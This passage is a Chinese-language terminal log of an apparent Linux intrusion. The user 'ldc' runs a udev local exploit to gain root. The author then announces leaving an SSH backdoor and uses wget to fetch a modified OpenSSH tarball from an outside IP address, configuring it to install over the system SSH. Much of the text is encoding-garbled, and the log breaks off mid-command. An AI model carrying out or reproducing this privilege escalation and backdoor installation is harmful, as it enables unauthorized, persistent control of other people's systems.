[摘要]grep udev root 477 0.0 0.0 2916 1396 ? S< 12:36 0:00 /sbin/udevd -d ldc ... grep udev root 477 0.0 0.0 2916 1396 ? S< 12:36 0:00 /sbin/udevd -d ldc 3462 0.0 0.0 4128 680 pts/0 S 13:00 0:00 grep udev [ldc@localhost .v]$ sh u.sh 476 suid.c: 鍦ㄥ嚱鏁?鈥榤ain鈥?涓細 suid.c:3: 璀﹀憡锛氶殣寮忓0鏄庝笌鍐呭缓鍑芥暟 鈥榚xecl鈥?涓嶅吋瀹 sh-3.1# id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh 已经是root权限了。 sh-3.1# w 13:25:18 up 48 min, 1 user, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT ldc pts/0 100.204.107.20 13:05 0.00s 0.12s 0.06s sshd: ldc [priv] sh-3.1# pwd /home/ldc/.v sh-3.1# ssh -V OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006 我们先留个ssh的后门。 sh-3.1# wget http://211.100.50.70/openssh4.3p2.tar.gz --13:32:08-- http://211.100.50.70/openssh4.3p2.tar.gz Connecting to 211.100.50.70:80... 宸茶繛鎺ャ€ 宸插彂鍑?HTTP 璇锋眰锛屾鍦ㄧ瓑寰呭洖搴?.. 200 OK 闀垮害锛?79990 (957K) [application/x-gzip] Saving t `openssh4.3p2.tar.gz' 100%[===========================================================================================>] 979,990 1.14M/s in 0.8s 13:32:08 (1.14 MB/s) - `openssh4.3p2.tar.gz' saved [979990/979990] sh-3.1# tar zxf openssh4.3p2.tar.gz sh-3.1# cd openssh-4.3p2/ sh-3.1# ./configure --divfix=/usr --sysconfdir=/etc/ssh checking for gcc... gcc checking for C compiler default output file name... a.out ............(省略若干行) sh-3.1# make && make install conffile=`echo sshd_config.out |